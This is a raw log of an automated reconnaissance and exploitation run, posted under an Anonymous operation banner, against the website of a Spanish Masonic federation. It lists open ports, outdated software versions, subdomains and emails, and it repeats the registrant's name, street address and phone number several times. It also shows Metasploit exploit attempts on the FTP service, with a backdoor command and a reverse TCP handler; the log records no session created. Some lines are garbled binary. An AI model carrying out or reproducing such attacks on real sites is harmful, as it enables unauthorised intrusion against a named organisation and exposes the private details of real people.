Anonymous #OPKilluminatie JTSEC Full Recon #3 2018

#######################################################################################################################################
Hostname 	elderechohumano.org 	  	ISP 	OVH SAS
Continent 	Europe 	  	Flag
FR
Country 	France 	  	Country Code 	FR
Region 	Unknown 	  	Local time 	23 May 2018 08:02 CEST
City 	Unknown 	  	Postal Code 	Unknown
IP Address 	51.255.33.229 	  	Latitude 	48.858
  	  	  	Longitude 	2.339
#######################################################################################################################################
HostIP:51.255.33.229
HostName:elderechohumano.org

Gathered Inet-whois information for 51.255.33.229
---------------------------------------------------------------------------------------------------------------------------------------


inetnum:        51.254.0.0 - 51.255.255.255
netname:        FR-OVH-20150522
descr:          OVH SAS
country:        FR
admin-c:        OTC2-RIPE
tech-c:         OTC2-RIPE
status:         LEGACY
mnt-by:         OVH-MNT
created:        2015-05-26T08:55:56Z
last-modified:  2015-05-27T15:52:47Z
source:         RIPE
org:            ORG-OS3-RIPE

organisation:   ORG-OS3-RIPE
org-name:       OVH SAS
org-type:       LIR
address:        2 rue Kellermann
address:        59100
address:        Roubaix
address:        FRANCE
phone:          +33972101007
abuse-c:        AR15333-RIPE
admin-c:        OTC2-RIPE
admin-c:        OK217-RIPE
admin-c:        GM84-RIPE
mnt-ref:        OVH-MNT
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         OVH-MNT
created:        2004-04-17T11:23:17Z
last-modified:  2017-10-30T14:40:06Z
source:         RIPE # Filtered

role:           OVH Technical Contact
address:        OVH SAS
address:        2 rue Kellermann
address:        59100 Roubaix
address:        France
admin-c:        OK217-RIPE
tech-c:         GM84-RIPE
tech-c:         SL10162-RIPE
nic-hdl:        OTC2-RIPE
abuse-mailbox:  abuse@ovh.net
mnt-by:         OVH-MNT
created:        2004-01-28T17:42:29Z
last-modified:  2014-09-05T10:47:15Z
source:         RIPE # Filtered

% Information related to '51.254.0.0/15AS16276'

route:          51.254.0.0/15
descr:          OVH
origin:         AS16276
mnt-by:         OVH-MNT
created:        2015-05-28T17:50:05Z
last-modified:  2015-05-28T17:50:05Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.91.2 (ANGUS)


Gathered Inic-whois information for elderechohumano.org
---------------------------------------------------------------------------------------------------------------------------------------
Domain Name: ELDERECHOHUMANO.ORG
Registry Domain ID: D92744226-LROR
Registrar WHOIS Server: whois.ovh.net
Registrar URL: http://www.ovh.com
Updated Date: 2017-12-02T16:33:10Z
Creation Date: 2002-12-02T17:17:14Z
Registry Expiry Date: 2018-12-02T17:17:14Z
Registrar Registration Expiration Date:
Registrar: OVH
Registrar IANA ID: 433
Registrar Abuse Contact Email: abuse@ovh.net
Registrar Abuse Contact Phone: +33.972101007
Reseller:
Domain Status: clientDeleteProhibited https://ic�U@/epp#�-���cl�ientDe
                                                                       ����leU@tePro����hi�U@bited��������
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C199852471-LROR
Registrant Name: Pedro-Jose Vila
Registrant Organization: El Derecho Humano
Registrant Street: c/Divino Valles, 3
Registrant City: Madrid
Registrant State/Province:
Registrant Postal Code: 28045
Registrant Country: ES
Registrant Phone: +34.665804522
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: rlbsbwl67oxhhx3qmeof@y.o-w-o.i�U@nfo
Registry Admin ID: C199852472-LROR
Admin Name: Pedro-Jose Vila
Admin Organization:
Admin Street: office #7888781
Admin Street: c/o OwO, BP80157
Admin City: Roubaix Cedex 1
Admin State/Province:
Admin Postal Code: 59053
Admin Country: FR
Admin Phone: +33.972101007
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
Registry Tech ID: C199852472-LROR
Tech Name: Pedro-Jose Vila
Tech Organization:
Tech Street: office #7888781
Tech Street: c/o OwO, BP80157
Tech City: Roubaix Cedex 1
Tech State/Province:
Tech Postal Code: 59053
Tech Country: FR
Tech Phone: +33.972101007
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
Name Server: SDNS2.OVH.NET
Name Server: VPS435959.OVH.NET
DNSSEC: unsigned
#######################################################################################################################################
[i] Scanning Site: http://elderechohumano.org


B A S I C   I N F O
=======================================================================================================================================


[+] Site Title: Federación española le droit humain el derecho humano &#8211; Logias españolas de la orden masónica mixta internacional
[+] IP address: 51.255.33.229
[+] Web Server: nginx
[+] CMS: WordPress
[+] Cloudflare: Not Detected
[+] Robots File: Could NOT Find robots.txt!


W H O I S   L O O K U P
=======================================================================================================================================

	Domain Name: ELDERECHOHUMANO.ORG
Registry Domain ID: D92744226-LROR
Registrar WHOIS Server: whois.ovh.net
Registrar URL: http://www.ovh.com
Updated Date: 2017-12-02T16:33:10Z
Creation Date: 2002-12-02T17:17:14Z
Registry Expiry Date: 2018-12-02T17:17:14Z
Registrar Registration Expiration Date:
Registrar: OVH
Registrar IANA ID: 433
Registrar Abuse Contact Email: abuse@ovh.net
Registrar Abuse Contact Phone: +33.972101007
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C199852471-LROR
Registrant Name: Pedro-Jose Vila
Registrant Organization: El Derecho Humano
Registrant Street: c/Divino Valles, 3
Registrant City: Madrid
Registrant State/Province:
Registrant Postal Code: 28045
Registrant Country: ES
Registrant Phone: +34.665804522
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: rlbsbwl67oxhhx3qmeof@y.o-w-o.info
Registry Admin ID: C199852472-LROR
Admin Name: Pedro-Jose Vila
Admin Organization:
Admin Street: office #7888781
Admin Street: c/o OwO, BP80157
Admin City: Roubaix Cedex 1
Admin State/Province:
Admin Postal Code: 59053
Admin Country: FR
Admin Phone: +33.972101007
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
Registry Tech ID: C199852472-LROR
Tech Name: Pedro-Jose Vila
Tech Organization:
Tech Street: office #7888781
Tech Street: c/o OwO, BP80157
Tech City: Roubaix Cedex 1
Tech State/Province:
Tech Postal Code: 59053
Tech Country: FR
Tech Phone: +33.972101007
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
Name Server: SDNS2.OVH.NET
Name Server: VPS435959.OVH.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-05-23T06:05:09Z <<<

For more information on Whois status codes, please visit https://icann.org/epp


G E O  I P  L O O K  U P
=======================================================================================================================================

[i] IP Address: 51.255.33.229
[i] Country: FR
[i] State: N/A
[i] City: N/A
[i] Latitude: 48.858200
[i] Longitude: 2.338700


H T T P   H E A D E R S
=======================================================================================================================================


[i]  HTTP/1.1 301 Moved Permanently
[i]  Server: nginx
[i]  Date: Wed, 23 May 2018 06:06:13 GMT
[i]  Content-Type: text/html
[i]  Content-Length: 178
[i]  Connection: close
[i]  Location: https://elderechohumano.org/
[i]  HTTP/1.1 302 Found
[i]  Server: nginx
[i]  Date: Wed, 23 May 2018 06:06:15 GMT
[i]  Content-Type: text/html; charset=iso-8859-1
[i]  Content-Length: 285
[i]  Connection: close
[i]  Location: https://elderechohumano.org/web
[i]  X-Powered-By: PleskLin
[i]  HTTP/1.1 301 Moved Permanently
[i]  Server: nginx
[i]  Date: Wed, 23 May 2018 06:06:17 GMT
[i]  Content-Type: text/html; charset=iso-8859-1
[i]  Content-Length: 310
[i]  Connection: close
[i]  Location: https://elderechohumano.org/web/
[i]  X-Powered-By: PleskLin
[i]  HTTP/1.1 200 OK
[i]  Server: nginx
[i]  Date: Wed, 23 May 2018 06:06:20 GMT
[i]  Content-Type: text/html; charset=UTF-8
[i]  Connection: close
[i]  X-Powered-By: PHP/5.6.31
[i]  X-Pingback: https://elderechohumano.org/web/xmlrpc.php
[i]  Link: <https://elderechohumano.org/web/wp-json/>; rel="https://api.w.org/", <https://wp.me/P4jvyk-a>; rel=shortlink
[i]  Vary: Accept-Encoding
[i]  X-Powered-By: PleskLin


D N S   L O O K U P
=======================================================================================================================================

;; Truncated, retrying in TCP mode.
elderechohumano.org.	43200	IN	MX	10 mail.elderechohumano.org.
elderechohumano.org.	43200	IN	A	51.255.33.229
elderechohumano.org.	43200	IN	NS	vps435959.ovh.net.
elderechohumano.org.	43200	IN	NS	sdns2.ovh.net.
elderechohumano.org.	43200	IN	TXT	"v=spf1 +a +mx -all"
elderechohumano.org.	43200	IN	SOA	sdns2.ovh.net. webmaster.elderechohumano.org. 2018051502 10800 3600 604800 10800


S U B N E T   C A L C U L A T I O N
=======================================================================================================================================

Address       = 51.255.33.229
Network       = 51.255.33.229 / 32
Netmask       = 255.255.255.255
Broadcast     = not needed on Point-to-Point links
Wildcard Mask = 0.0.0.0
Hosts Bits    = 0
Max. Hosts    = 1   (2^0 - 0)
Host Range    = { 51.255.33.229 - 51.255.33.229 }


N M A P   P O R T   S C A N
=======================================================================================================================================


Starting Nmap 7.01 ( https://nmap.org ) at 2018-05-23 06:06 UTC
Nmap scan report for elderechohumano.org (51.255.33.229)
Host is up (0.082s latency).
rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           ProFTPD
22/tcp   open     ssh           OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
23/tcp   closed   telnet
25/tcp   open     smtp          Postfix smtpd
80/tcp   open     http          nginx
110/tcp  open     pop3          Courier pop3d
143/tcp  open     imap          Courier Imapd (released 2015)
443/tcp  open     ssl/http      nginx
445/tcp  filtered microsoft-ds
3389/tcp closed   ms-wbt-server
Service Info: Hosts: 51.255.33.229,  vps435959.ovh.net, localhost.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.00 seconds

#######################################################################################################################################
[!] IP Address : 51.255.33.229
[!] Server: nginx
[!] Powered By: PHP/5.6.31, PleskLin
[+] Clickjacking protection is not in place.
[+] Operating System : Ubuntu&#34;
[!] elderechohumano.org doesn't seem to use a CMS
[+] Honeypot Probabilty: 30%
---------------------------------------------------------------------------------------------------------------------------------------
[~] Trying to gather whois information for elderechohumano.org
[+] Whois information found
[-] Unable to build response, visit https://who.is/whois/elderechohumano.org
---------------------------------------------------------------------------------------------------------------------------------------
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           ProFTPD
22/tcp   open     ssh           OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
23/tcp   closed   telnet
25/tcp   open     smtp          Postfix smtpd
80/tcp   open     http          nginx
110/tcp  open     pop3          Courier pop3d
143/tcp  open     imap          Courier Imapd (released 2015)
443/tcp  open     ssl/http      nginx
445/tcp  filtered microsoft-ds
3389/tcp closed   ms-wbt-server
---------------------------------------------------------------------------------------------------------------------------------------

[+] DNS Records
sdns2.ovh.net. (213.251.188.141) AS16276 OVH SAS France
vps435959.ovh.net. (51.255.33.229) AS16276 OVH SAS France

[+] MX Records
10 (51.255.33.229) AS16276 OVH SAS France

[+] Host Records (A)
mail.elderechohumano.orgHTTP: (229.ip-51-255-33.eu) (51.255.33.229) AS16276 OVH SAS France

[+] TXT Records
"v=spf1 +a +mx -all"

[+] DNS Map: https://dnsdumpster.com/static/map/elderechohumano.org.png

[>] Initiating 3 intel modules
[>] Loading Alpha module (1/3)
[>] Beta module deployed (2/3)
[>] Gamma module initiated (3/3)


[+] Emails found:
---------------------------------------------------------------------------------------------------------------------------------------
gran.secretaria@elderechohumano.org
webmaster@elderechohumano.org

[+] Hosts found in search engines:
---------------------------------------------------------------------------------------------------------------------------------------
[-] Resolving hostnames IPs...
51.255.33.229:webmail.elderechohumano.org
51.255.33.229:www.elderechohumano.org
[+] Virtual hosts:
---------------------------------------------------------------------------------------------------------------------------------------
#######################################################################################################################################
Server:		10.211.254.254
Address:	10.211.254.254#53

Non-authoritative answer:
Name:	elderechohumano.org
Address: 51.255.33.229

elderechohumano.org has address 51.255.33.229
elderechohumano.org mail is handled by 10 mail.elderechohumano.org.
#######################################################################################################################################

Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu

[+] Target is elderechohumano.org
[+] Loading modules.
[+] Following modules are loaded:
[x] [1] ping:icmp_ping  -  ICMP echo discovery module
[x] [2] ping:tcp_ping  -  TCP-based ping discovery module
[x] [3] ping:udp_ping  -  UDP-based ping discovery module
[x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
[x] [5] infogather:portscan  -  TCP and UDP PortScanner
[x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
[x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
[x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
[x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
[x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
[x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
[x] [12] fingerprint:smb  -  SMB fingerprinting module
[x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
[+] 13 modules registered
[+] Initializing scan engine
[+] Running scan engine
[-] ping:tcp_ping module: no closed/open TCP ports known on 51.255.33.229. Module test failed
[-] ping:udp_ping module: no closed/open UDP ports known on 51.255.33.229. Module test failed
[-] No distance calculation. 51.255.33.229 appears to be dead or no ports known
[+] Host: 51.255.33.229 is up (Guess probability: 50%)
[+] Target: 51.255.33.229 is alive. Round-Trip Time: 0.49170 sec
[+] Selected safe Round-Trip Time value is: 0.98339 sec
[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
[-] fingerprint:smb need either TCP port 139 or 445 to run
[+] Primary guess:
[+] Host 51.255.33.229 Running OS: гT��U (Guess probability: 100%)
[+] Other guesses:
[+] Host 51.255.33.229 Running OS: 0
V��U (Guess probability: 100%)
[+] Host 51.255.33.229 Running OS: 0
V��U (Guess probability: 100%)
[+] Host 51.255.33.229 Running OS: 0
V��U (Guess probability: 100%)
[+] Host 51.255.33.229 Running OS: гT��U (Guess probability: 100%)
[+] Host 51.255.33.229 Running OS: 0
V��U (Guess probability: 100%)
[+] Host 51.255.33.229 Running OS: гT��U (Guess probability: 100%)
[+] Host 51.255.33.229 Running OS: 0
V��U (Guess probability: 100%)
[+] Host 51.255.33.229 Running OS: 0
V��U (Guess probability: 100%)
[+] Host 51.255.33.229 Running OS: 0
V��U (Guess probability: 100%)
[+] Cleaning up scan engine
[+] Modules deinitialized
[+] Execution completed.
#######################################################################################################################################
Domain Name: ELDERECHOHUMANO.ORG
Registry Domain ID: D92744226-LROR
Registrar WHOIS Server: whois.ovh.net
Registrar URL: http://www.ovh.com
Updated Date: 2017-12-02T16:33:10Z
Creation Date: 2002-12-02T17:17:14Z
Registry Expiry Date: 2018-12-02T17:17:14Z
Registrar Registration Expiration Date:
Registrar: OVH
Registrar IANA ID: 433
Registrar Abuse Contact Email: abuse@ovh.net
Registrar Abuse Contact Phone: +33.972101007
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C199852471-LROR
Registrant Name: Pedro-Jose Vila
Registrant Organization: El Derecho Humano
Registrant Street: c/Divino Valles, 3
Registrant City: Madrid
Registrant State/Province:
Registrant Postal Code: 28045
Registrant Country: ES
Registrant Phone: +34.665804522
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: rlbsbwl67oxhhx3qmeof@y.o-w-o.info
Registry Admin ID: C199852472-LROR
Admin Name: Pedro-Jose Vila
Admin Organization:
Admin Street: office #7888781
Admin Street: c/o OwO, BP80157
Admin City: Roubaix Cedex 1
Admin State/Province:
Admin Postal Code: 59053
Admin Country: FR
Admin Phone: +33.972101007
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
Registry Tech ID: C199852472-LROR
Tech Name: Pedro-Jose Vila
Tech Organization:
Tech Street: office #7888781
Tech Street: c/o OwO, BP80157
Tech City: Roubaix Cedex 1
Tech State/Province:
Tech Postal Code: 59053
Tech Country: FR
Tech Phone: +33.972101007
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
Name Server: SDNS2.OVH.NET
Name Server: VPS435959.OVH.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-05-23T06:03:55Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
#######################################################################################################################################

; <<>> DiG 9.11.3-1-Debian <<>> -x elderechohumano.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 8910
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;org.elderechohumano.in-addr.arpa. IN	PTR

;; AUTHORITY SECTION:
in-addr.arpa.		3600	IN	SOA	b.in-addr-servers.arpa. nstld.iana.org. 2018013375 1800 900 604800 3600

;; Query time: 228 msec
;; SERVER: 10.211.254.254#53(10.211.254.254)
;; WHEN: Wed May 23 02:04:55 EDT 2018
;; MSG SIZE  rcvd: 129

dnsenum VERSION:1.2.4

-----   elderechohumano.org   -----


Host's addresses:
__________________

elderechohumano.org.                     86176    IN    A        51.255.33.229


Name Servers:
______________

vps435959.ovh.net.                       674      IN    A        51.255.33.229
sdns2.ovh.net.                           689      IN    A        213.251.188.141


Mail (MX) Servers:
___________________

mail.elderechohumano.org.                86400    IN    A        51.255.33.229


Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for elderechohumano.org on sdns2.ovh.net ...

Trying Zone Transfer for elderechohumano.org on vps435959.ovh.net ...

brute force file not specified, bay.
#######################################################################################################################################
[-] Enumerating subdomains now for elderechohumano.org
[-] verbosity is enabled, will show the subdomains results in realtime
[-] Searching now in Baidu..
[-] Searching now in Yahoo..
[-] Searching now in Google..
[-] Searching now in Bing..
[-] Searching now in Ask..
[-] Searching now in Netcraft..
[-] Searching now in DNSdumpster..
[-] Searching now in Virustotal..
[-] Searching now in ThreatCrowd..
[-] Searching now in SSL Certificates..
[-] Searching now in PassiveDNS..
Virustotal: voces.elderechohumano.org
Virustotal: www.elderechohumano.org
Virustotal: mail.elderechohumano.org
SSL Certificates: voces.elderechohumano.org
SSL Certificates: www.elderechohumano.org
[!] Error: Google probably now is blocking our requests
[~] Finished now the Google Enumeration ...
DNSdumpster: mail.elderechohumano.org
[-] Saving results to file: /usr/share/sniper/loot/elderechohumano.org/domains/domains-elderechohumano.org.txt
[-] Total Unique Subdomains Found: 3
www.elderechohumano.org
mail.elderechohumano.org
voces.elderechohumano.org
#######################################################################################################################################
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  discover v0.5.0 - by @michenriksen

Identifying nameservers for elderechohumano.org... Done
Using nameservers:

 - 51.255.33.229
 - 213.251.188.141

Checking for wildcard DNS... Done

Running collector: DNSDB... Done (2 hosts)
Running collector: Netcraft... Done (0 hosts)
Running collector: Dictionary... Done (26 hosts)
Running collector: Wayback Machine... Done (6 hosts)
Running collector: Shodan... Skipped
 -> Key 'shodan' has not been set
Running collector: VirusTotal... Skipped
 -> Key 'virustotal' has not been set
Running collector: PublicWWW... Done (0 hosts)
Running collector: Censys... Skipped
 -> Key 'censys_secret' has not been set
Running collector: Threat Crowd... Done (0 hosts)
Running collector: Certificate Search... Done (2 hosts)
Running collector: PTRArchive... Error
 -> PTRArchive returned unexpected response code: 502
Running collector: Riddler... Skipped
 -> Key 'riddler_username' has not been set
Running collector: PassiveTotal... Skipped
 -> Key 'passivetotal_key' has not been set
Running collector: HackerTarget... Done (1 host)
Running collector: Google Transparency Report... Done (0 hosts)

Resolving 33 unique hosts...
51.255.33.229   .elderechohumano.org
51.255.33.229   elderechohumano.org
51.255.33.229   ftp.elderechohumano.org
51.255.33.229   mail.elderechohumano.org
51.255.33.229   voces.elderechohumano.org
51.255.33.229   webmail.elderechohumano.org
51.255.33.229   www.elderechohumano.org

Found subnets:

 - 51.255.33.0-255   : 7 hosts

Wrote 7 hosts to:

 - file:///root/aquatone/elderechohumano.org/hosts.txt
 - file:///root/aquatone/elderechohumano.org/hosts.json
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  takeover v0.5.0 - by @michenriksen

Loaded 7 hosts from /root/aquatone/elderechohumano.org/hosts.json
Loaded 25 domain takeover detectors

Identifying nameservers for elderechohumano.org... Done
Using nameservers:

 - 213.251.188.141
 - 51.255.33.229

Checking hosts for domain takeover vulnerabilities...

Finished checking hosts:

 - Vulnerable     : 0
 - Not Vulnerable : 7

Wrote 0 potential subdomain takeovers to:

 - file:///root/aquatone/elderechohumano.org/takeovers.json

                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  scan v0.5.0 - by @michenriksen

Loaded 7 hosts from /root/aquatone/elderechohumano.org/hosts.json

Probing 2 ports...
443/tcp   51.255.33.229   webmail.elderechohumano.org, mail.elderechohumano.org, .elderechohumano.org and 4 more
80/tcp    51.255.33.229   ftp.elderechohumano.org, mail.elderechohumano.org, www.elderechohumano.org and 4 more

Wrote open ports to file:///root/aquatone/elderechohumano.org/open_ports.txt
Wrote URLs to file:///root/aquatone/elderechohumano.org/urls.txt
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  gather v0.5.0 - by @michenriksen

Processing 14 pages...

Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)

.elderechohumano.org : empty
Webmail.elderechohumano.org : 51.255.33.229
mail.elderechohumano.org : 51.255.33.229
voces.elderechohumano.org : 51.255.33.229
webmail.elderechohumano.org : 51.255.33.229
www.elderechohumano.org : 51.255.33.229

[+] Virtual hosts:
------------------
webmail.elderechohumano.org 	web.arena.ne.jp

#######################################################################################################################################
PING elderechohumano.org (51.255.33.229) 56(84) bytes of data.
64 bytes from 229.ip-51-255-33.eu (51.255.33.229): icmp_seq=1 ttl=37 time=479 ms

--- elderechohumano.org ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 479.315/479.315/479.315/0.000 ms
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:09 EDT
Warning: 51.255.33.229 giving up on port because retransmission cap hit (2).
Nmap scan report for elderechohumano.org (51.255.33.229)
Host is up (0.48s latency).
rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
Not shown: 457 closed ports, 6 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
143/tcp  open  imap
443/tcp  open  https
465/tcp  open  smtps
587/tcp  open  submission
993/tcp  open  imaps
995/tcp  open  pop3s
3306/tcp open  mysql
7080/tcp open  empowerid

Nmap done: 1 IP address (1 host up) scanned in 8.53 seconds
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:10 EDT
Nmap scan report for elderechohumano.org (51.255.33.229)
Host is up (0.48s latency).
rDNS record for 51.255.33.229: 229.ip-51-255-33.eu

PORT     STATE         SERVICE
53/udp   open          domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs

Nmap done: 1 IP address (1 host up) scanned in 6.35 seconds
#######################################################################################################################################
 + -- --=[Port 21 opened... running tests...
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:10 EDT
Nmap scan report for elderechohumano.org (51.255.33.229)
Host is up (0.39s latency).
rDNS record for 51.255.33.229: 229.ip-51-255-33.eu

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 3.X|2.6.X (93%)
OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 3.2.0 (93%), Linux 2.6.18 - 2.6.22 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 51.255.33.229; OS: Unix

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   479.61 ms 229.ip-51-255-33.eu (51.255.33.229)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 613.26 seconds
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v4.16.57-dev                         ]
+ -- --=[ 1767 exploits - 1007 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

RHOST => elderechohumano.org
RHOSTS => elderechohumano.org
[*] elderechohumano.org:21 - Banner: 220 51.255.33.229 FTP server ready
[*] elderechohumano.org:21 - USER: 550 SSL/TLS required on the control channel
[-] elderechohumano.org:21 - This server did not respond as expected: 550 SSL/TLS required on the control channel
[*] Exploit completed, but no session was created.
[*] Started reverse TCP double handler on 10.211.1.5:4444
[*] elderechohumano.org:21 - Sending Backdoor Command
[*] Exploit completed, but no session was created.
 + -- --=[Port 22 opened... running tests...
# general
(gen) banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10
(gen) software: OpenSSH 6.6.1p1
(gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) curve25519-sha256@libssh.org          -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256                    -- [fail] using weak elliptic curves
